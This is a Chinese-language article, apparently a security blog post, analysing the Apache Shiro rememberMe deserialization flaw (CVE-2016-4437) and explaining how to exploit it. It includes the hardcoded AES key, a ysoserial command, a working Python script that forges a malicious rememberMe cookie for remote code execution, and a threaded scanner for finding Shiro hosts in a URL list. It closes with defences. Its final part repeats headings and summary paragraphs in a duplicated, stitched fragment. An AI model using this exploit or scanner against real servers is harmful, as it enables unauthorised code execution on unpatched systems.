Apache Shiro 反序列化漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
Apache Shiro <= 1.2.4 版本存在反序列化漏洞（CVE-2016-4437），攻击者可以通过构造恶意的rememberMe cookie值，利用Shiro默认的AES加密密钥，执行任意代码。<\/p>

漏洞原理<\/h2>

Shiro的CookieRememberMeManager<\/code>类在处理"记住我"功能时存在以下流程：<\/p>


检索rememberMe cookie的值<\/li>
Base64解码<\/li>
使用AES解密<\/li>
使用Java反序列化(ObjectInputStream)<\/li>
<\/ol>
漏洞关键点：<\/p>

使用硬编码的AES加密密钥（kPH+bIxk5D2deZiIxcaaaA==<\/code>）<\/li>
对用户可控的rememberMe值进行反序列化操作<\/li>
<\/ul>
环境搭建<\/h2>

下载Shiro 1.2.4版本的war包<\/li>
将war包放入Tomcat的webapps目录<\/li>
启动Tomcat，war包会自动解压<\/li>
使用IDEA打开解压后的文件夹进行调试<\/li>
<\/ol>
IDEA调试配置：<\/p>

Run -> Edit Configurations<\/li>
添加Tomcat Server (Local)<\/li>
配置Tomcat路径<\/li>
选择JRE版本<\/li>
Deployment中添加解压后的shiro文件夹<\/li>
<\/ul>
漏洞分析<\/h2>
加密流程分析<\/h3>

用户登录时勾选"Remember Me"<\/li>
Shiro将用户名序列化<\/li>
使用AES加密序列化数据：

密钥：kPH+bIxk5D2deZiIxcaaaA==<\/code>（Base64解码后使用）<\/li>
模式：CBC<\/li>
填充：PKCS5Padding<\/li>
IV：随机生成的16字节<\/li>
<\/ul>
<\/li>
将IV与加密结果拼接<\/li>
对拼接结果进行Base64编码<\/li>
将结果存入rememberMe cookie<\/li>
<\/ol>
加密过程伪代码：<\/p>
明文 = 序列化(用户名)
IV = 随机16字节
密文 = AES_CBC_加密(明文, 密钥, IV)
最终结果 = Base64(IV + 密文)
<\/code><\/pre>
解密流程分析<\/h3>

从cookie中获取rememberMe值<\/li>
Base64解码<\/li>
分离前16字节作为IV，剩余部分作为密文<\/li>
AES解密：

使用相同密钥<\/li>
CBC模式<\/li>
PKCS5Padding<\/li>
<\/ul>
<\/li>
对解密结果进行反序列化<\/li>
<\/ol>
解密过程伪代码：<\/p>
原始数据 = Base64解码(rememberMe值)
IV = 原始数据[0:16]
密文 = 原始数据[16:]
明文 = AES_CBC_解密(密文, 密钥, IV)
反序列化(明文)
<\/code><\/pre>
漏洞利用点<\/h3>

密钥硬编码在AbstractRememberMeManager<\/code>类中<\/li>
攻击者可以构造恶意序列化数据，使用已知密钥加密<\/li>
Shiro会解密并反序列化攻击者提供的数据<\/li>
<\/ol>
漏洞利用<\/h2>
利用工具<\/h3>
使用ysoserial生成反序列化payload：<\/p>
java -jar ysoserial.jar CommonsCollections10 "command"<\/span> > payload.bin
<\/span><\/span><\/code><\/pre>Python利用脚本<\/h3>
from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>import<\/span> base64,<\/span> uuid
<\/span><\/span>import<\/span> subprocess
<\/span><\/span>
<\/span><\/span>key =<\/span> 'kPH+bIxk5D2deZiIxcaaaA=='<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> encrypt<\/span>(target):
<\/span><\/span>    iv =<\/span> uuid.<\/span>uuid4().<\/span>bytes  # 随机生成16字节IV<\/span>
<\/span><\/span>    realkey =<\/span> base64.<\/span>b64decode(key)  # 解码密钥<\/span>
<\/span><\/span>    mode =<\/span> AES.<\/span>MODE_CBC
<\/span><\/span>    pad =<\/span> lambda<\/span> s: s +<\/span> ((16<\/span> -<\/span> len(s) %<\/span> 16<\/span>) *<\/span> chr(16<\/span> -<\/span> len(s) %<\/span> 16<\/span>)).<\/span>encode()
<\/span><\/span>    resultAES =<\/span> AES.<\/span>new(realkey, mode, iv)
<\/span><\/span>    nice =<\/span> resultAES.<\/span>encrypt(pad(target))
<\/span><\/span>    nice =<\/span> iv +<\/span> nice
<\/span><\/span>    nice =<\/span> base64.<\/span>b64encode(nice)
<\/span><\/span>    return<\/span> nice.<\/span>decode("utf-8"<\/span>)
<\/span><\/span>
<\/span><\/span># 生成payload<\/span>
<\/span><\/span>popen =<\/span> subprocess.<\/span>Popen('java -jar ysoserial.jar CommonsCollections10 "command"'<\/span>, 
<\/span><\/span>                         shell=<\/span>True<\/span>, stdout=<\/span>subprocess.<\/span>PIPE)
<\/span><\/span>payload =<\/span> popen.<\/span>stdout.<\/span>read()
<\/span><\/span>
<\/span><\/span># 加密payload<\/span>
<\/span><\/span>rememberMe_cookie =<\/span> encrypt(payload)
<\/span><\/span>print("恶意rememberMe cookie:"<\/span>, rememberMe_cookie)
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

使用ysoserial生成恶意序列化payload<\/li>
使用上述脚本加密payload<\/li>
将生成的rememberMe值作为cookie发送给目标<\/li>
目标服务器会解密并反序列化payload，执行命令<\/li>
<\/ol>
Shiro组件检测<\/h2>
检测脚本<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> re
<\/span><\/span>import<\/span> threadpool
<\/span><\/span>
<\/span><\/span>requests.<\/span>packages.<\/span>urllib3.<\/span>disable_warnings()
<\/span><\/span>
<\/span><\/span>def<\/span> check_shiro<\/span>(url):
<\/span><\/span>    headers =<\/span> {'Cookie'<\/span>: 'rememberMe=1'<\/span>}
<\/span><\/span>    try<\/span>:
<\/span><\/span>        # 不跟随重定向<\/span>
<\/span><\/span>        resp_no_redirect =<\/span> requests.<\/span>head(url, headers=<\/span>headers, 
<\/span><\/span>                                       allow_redirects=<\/span>False<\/span>, 
<\/span><\/span>                                       verify=<\/span>False<\/span>, 
<\/span><\/span>                                       timeout=<\/span>6<\/span>)
<\/span><\/span>        # 跟随重定向<\/span>
<\/span><\/span>        resp_with_redirect =<\/span> requests.<\/span>head(url, headers=<\/span>headers, 
<\/span><\/span>                                         verify=<\/span>False<\/span>, 
<\/span><\/span>                                         timeout=<\/span>6<\/span>)
<\/span><\/span>        
<\/span><\/span>        # 检查响应头<\/span>
<\/span><\/span>        for<\/span> resp in<\/span> [resp_no_redirect, resp_with_redirect]:
<\/span><\/span>            headers =<\/span> str(resp.<\/span>headers)
<\/span><\/span>            if<\/span> ('rememberMe'<\/span> in<\/span> headers or<\/span> 
<\/span><\/span>                'deleteMe'<\/span> in<\/span> headers or<\/span> 
<\/span><\/span>                re.<\/span>search('^re(.*?)Me'<\/span>, headers)):
<\/span><\/span>                return<\/span> True<\/span>
<\/span><\/span>        return<\/span> False<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        return<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    with<\/span> open('urls.txt'<\/span>) as<\/span> f:
<\/span><\/span>        urls =<\/span> [line.<\/span>strip() for<\/span> line in<\/span> f]
<\/span><\/span>    
<\/span><\/span>    pool =<\/span> threadpool.<\/span>ThreadPool(10<\/span>)
<\/span><\/span>    requests =<\/span> threadpool.<\/span>makeRequests(check_shiro, urls)
<\/span><\/span>    [pool.<\/span>putRequest(req) for<\/span> req in<\/span> requests]
<\/span><\/span>    pool.<\/span>wait()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>检测条件<\/h3>

发送带有rememberMe=1的cookie<\/li>
检查响应头是否包含：

rememberMe<\/li>
deleteMe<\/li>
匹配正则^re(.*?)Me<\/code>的字段<\/li>
<\/ul>
<\/li>
分别检查跟随重定向和不跟随重定向的情况<\/li>
<\/ol>
防御措施<\/h2>

升级Shiro到最新版本<\/li>
修改默认加密密钥<\/li>
禁用rememberMe功能（如果不需要）<\/li>
使用Java安全管理器限制反序列化<\/li>
<\/ol>
总结<\/h2>
Shiro反序列化漏洞利用条件简单，危害严重。通过分析加密解密流程，攻击者可以构造恶意payload实现远程代码执行。管理员应及时升级组件并修改默认配置，开发者应避免使用不安全的反序列化操作。<\/p>

Apache Shiro 反序列化漏洞分析与利用指南<\/h1>

漏洞概述<\/h2> Apache Shiro <= 1.2.4 版本存在反序列化漏洞（CVE-2016-4437），攻击者可以通过构造恶意的rememberMe cookie值，利用Shiro默认的AES加密密钥，执行任意代码。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

Shiro组件检测<\/h2>

总结<\/h2> Shiro反序列化漏洞利用条件简单，危害严重。通过分析加密解密流程，攻击者可以构造恶意payload实现远程代码执行。管理员应及时升级组件并修改默认配置，开发者应避免使用不安全的反序列化操作。<\/p>

漏洞概述<\/h2>
Apache Shiro <= 1.2.4 版本存在反序列化漏洞（CVE-2016-4437），攻击者可以通过构造恶意的rememberMe cookie值，利用Shiro默认的AES加密密钥，执行任意代码。<\/p>

总结<\/h2>
Shiro反序列化漏洞利用条件简单，危害严重。通过分析加密解密流程，攻击者可以构造恶意payload实现远程代码执行。管理员应及时升级组件并修改默认配置，开发者应避免使用不安全的反序列化操作。<\/p>